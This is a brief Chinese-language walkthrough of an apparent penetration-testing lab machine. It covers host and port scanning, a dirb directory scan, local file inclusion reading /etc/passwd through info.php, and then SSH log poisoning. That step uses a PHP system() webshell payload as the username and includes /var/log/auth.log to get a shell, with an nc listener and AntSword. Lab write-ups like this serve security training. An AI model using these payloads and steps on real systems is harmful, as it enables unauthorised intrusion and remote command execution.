nmap扫描存活主机确定靶场ip
接下来扫描靶机的端口
然后访问web服务
网站目录扫描
dirb http://192.168.134.141
访问antibot_image发现存在目录遍历
发现info.php是phpinfo的界面
查看页面源代码发现一串文件包含的代码
http://192.168.134.141/antibot_image/antibots/info.php?image=/etc/passwd
接下来尝试文件包含被污染的SSH日志来getshell
这样'<?php system($_GET['shell']); ?>'该用户就会被记录到ssh的日志中去
ssh日志在/var/log/auth.log中
开启nc监听
连接蚁🗡
http://192.168.134.141/antibot_image/antibots/info.php?image=//var/log/auth.log